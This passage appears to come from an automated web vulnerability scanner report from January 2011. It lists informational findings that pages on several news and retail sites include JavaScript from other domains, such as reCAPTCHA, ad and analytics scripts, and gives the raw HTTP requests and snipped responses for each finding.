</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1211. http://www.netlingo.com/word/fingerprint.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/fingerprint.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/fingerprint.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1212. http://www.netlingo.com/word/gadget.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/gadget.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/gadget.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1213. http://www.netlingo.com/word/gizmo.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/gizmo.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/gizmo.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1214. http://www.netlingo.com/word/lm4azzzz.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/lm4azzzz.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/lm4azzzz.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1215. http://www.netlingo.com/word/mih.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/mih.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/mih.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1216. http://www.netlingo.com/word/next-generation.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/next-generation.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/next-generation.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1217. http://www.netlingo.com/word/online-jargon.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/online-jargon.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/online-jargon.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1218. http://www.netlingo.com/word/ru18-2.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/ru18-2.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/ru18-2.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1219. http://www.netlingo.com/word/wtg4a.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/wtg4a.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/wtg4a.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1220. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /community/blog/ebay-use-joomla-open-source-glue

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/idge.nww.subnet_opensource/;pos=lb2;sz=195x90;tile=2;ord=120353?
  • http://admin.brightcove.com/js/experience_util.js
  • http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse
  • http://api.recaptcha.net/challenge?k=6LcD8bwSAAAAAJY2_ih78yM8RE0DpYRwhHpqw6vL
  • http://content.dl-rms.com/rms/mother/575/nodetag.js
  • http://d.yimg.com/ds/badge2.js
  • http://jlinks.industrybrains.com/jsct?sid=93&ct=NETWORKWORLD_HomePage_and_ROS&num=6&layt=10&fmt=simp
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /community/blog/ebay-use-joomla-open-source-glue HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Cneonction: close
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 05:03:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:03:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295931833340495; path=/; expires=Thu, 24-Jan-13 05:03:53 GMT
Set-Cookie: SESSa27dc0841fd4d8567c009be96a283c67=cl3ko5pm3b3hr81s3vr2lv1nc2; expires=Thu, 17-Feb-2011 08:37:13 GMT; path=/; domain=.networkworld.com
Content-Length: 95231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns = "http://www.w3.org/1999/xhtml" xml:lang = "en" lang = "en">
<head
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...
</script>
<script src="http://admin.brightcove.com/js/experience_util.js" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag -->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/idge.nww.subnet_opensource/;pos=lb2;sz=195x90;tile=2;ord=120353?" ></SCRIPT>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<td><script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text">http://www.networkworld.com/community/index.php</script>
...[SNIP]...
<div class="description"><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LcD8bwSAAAAAJY2_ih78yM8RE0DpYRwhHpqw6vL"></script>
...[SNIP]...
</h3>
       <script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=NETWORKWORLD_HomePage_and_ROS&num=6&layt=10&fmt=simp"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/575/nodetag.js"></script>
...[SNIP]...

21.1221. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://admin.brightcove.com/js/experience_util.js
  • http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse
  • http://api.recaptcha.net/challenge?k=6LcD8bwSAAAAAJY2_ih78yM8RE0DpYRwhHpqw6vL
  • http://bit.ly/javascript-api.js?version=latest&login=tweettrackjs&apiKey=R_7e9987b2fd13d7e4e881f9cbb168f523
  • http://content.dl-rms.com/rms/mother/575/nodetag.js
  • http://jlinks.industrybrains.com/jsct?sid=93&ct=NETWORKWORLD_HomePage_and_ROS&num=1&layt=8&fmt=simp
  • http://jlinks.industrybrains.com/jsct?sid=93&ct=NETWORKWORLD_HomePage_and_ROS&num=6&layt=10&fmt=simp
  • http://s.bit.ly/TweetAndTrack.js?v=1.01
  • http://wd.sharethis.com/button/buttons.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /news/2010/100710-ebay-deploys-joomla-for-analytics.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Tue, 25 Jan 2011 05:03:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...
</script>
<script src="http://admin.brightcove.com/js/experience_util.js" type="text/javascript"></script>
...[SNIP]...
<!-- END #floating_tools -->
<script type="text/javascript" src="http://wd.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<div id="comments_form_recaptcha"><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LcD8bwSAAAAAJY2_ih78yM8RE0DpYRwhHpqw6vL"></script>
...[SNIP]...
</div>
<script src="http://admin.brightcove.com/js/experience_util.js" type="text/javascript"></script>
...[SNIP]...
<div id="col3_sponsoredlinks" class="module large">
       <script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=NETWORKWORLD_HomePage_and_ROS&num=1&layt=8&fmt=simp"> </script>
...[SNIP]...
</h3>
       <script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=NETWORKWORLD_HomePage_and_ROS&num=6&layt=10&fmt=simp"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/575/nodetag.js"></script>
...[SNIP]...
<!-- Twitter + short url javascript for article pages -->

   <script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=tweettrackjs&apiKey=R_7e9987b2fd13d7e4e881f9cbb168f523"></script>
   <script type="text/javascript" charset="utf-8" src="http://s.bit.ly/TweetAndTrack.js?v=1.01 "></script>
...[SNIP]...

21.1222. http://www.newsvine.com/_wine/save

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_wine/save

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
  • http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
  • http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
  • http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /_wine/save HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 05:02:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=78a8cf29905fb686db7d439484f26124; expires=Mon, 20-Jan-2031 05:02:55 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/login?popoff&redirect=http%3A%2F%2Fwww.newsvine.com%2F_wine%2Fsave
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 15929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
...[SNIP]...

21.1223. http://www.npr.org/2011/01/24/133171246/Business-News/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.npr.org
Path:   /2011/01/24/133171246/Business-News/x22

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d.yimg.com/ds/badge.js
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /2011/01/24/133171246/Business-News/x22 HTTP/1.1
Host: www.npr.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:30 GMT
Server: Apache
Vary: Accept,User-Agent, Accept-Encoding
Last-Modified: Mon, 24 Jan 2011 15:56:53 GMT
Accept-Ranges: bytes
Content-Length: 58952
Cache-Control: max-age=0
Expires: Mon, 24 Jan 2011 16:01:30 GMT
Keep-Alive: timeout=10, max=4999
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Amazon To Offer Gr
...[SNIP]...
<li><script type="text/javascript" showbranding="0" src="http://d.yimg.com/ds/badge.js" badgetype="text">npr708:http://www.npr.org/2011/01/24/133171246/Business-News</script>
...[SNIP]...
<li><script type="text/javascript" showbranding="0" src="http://d.yimg.com/ds/badge.js" badgetype="text">npr708:http://www.npr.org/2011/01/24/133171246/Business-News</script>
...[SNIP]...
<div id="googledonatead">
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<div id="globalcontentbottom">
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.1224. http://www.npr.org/2011/01/24/133171246/Business-News/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CIQBELYKMAw/x22/x3eShared

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.npr.org
Path:   /2011/01/24/133171246/Business-News/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CIQBELYKMAw/x22/x3eShared

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d.yimg.com/ds/badge.js
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /2011/01/24/133171246/Business-News/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CIQBELYKMAw/x22/x3eShared HTTP/1.1
Host: www.npr.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
X-Cache: jpcache vv2 - npr-html
Cache-Control: max-age=0
Expires: Mon, 24 Jan 2011 16:01:31 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Amazon To Offer Gr
...[SNIP]...
<li><script type="text/javascript" showbranding="0" src="http://d.yimg.com/ds/badge.js" badgetype="text">npr708:http://www.npr.org/2011/01/24/133171246/Business-News</script>
...[SNIP]...
<li><script type="text/javascript" showbranding="0" src="http://d.yimg.com/ds/badge.js" badgetype="text">npr708:http://www.npr.org/2011/01/24/133171246/Business-News</script>
...[SNIP]...
<div id="googledonatead">
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<div id="globalcontentbottom">
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.1225. http://www.officedepot.com/promo.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officedepot.com
Path:   /promo.do

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://static.atgsvcs.com/js/atgsvcs.js
  • http://static.www.odcdn.com/1421577119/bundles/cm.js
  • http://static.www.odcdn.com/1485153267/includes/customerservice.js
  • http://static.www.odcdn.com/N136538418/bundles/lib.js

Request

GET /promo.do?file=/promo/pages/0928_recycling.jsp HTTP/1.1
Host: www.officedepot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Tue, 25 Jan 2011 05:04:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=00002h8pqL-kKjohUfB_dlmEiD4:13ddq0tfm; Path=/
Set-Cookie: jsession_unique_id=1295931849796; Expires=Tue, 25 Jan 2011 06:34:09 GMT; Path=/
Set-Cookie: CU_BRAND=OD; Expires=Fri, 20 Jan 2012 05:04:09 GMT; Path=/
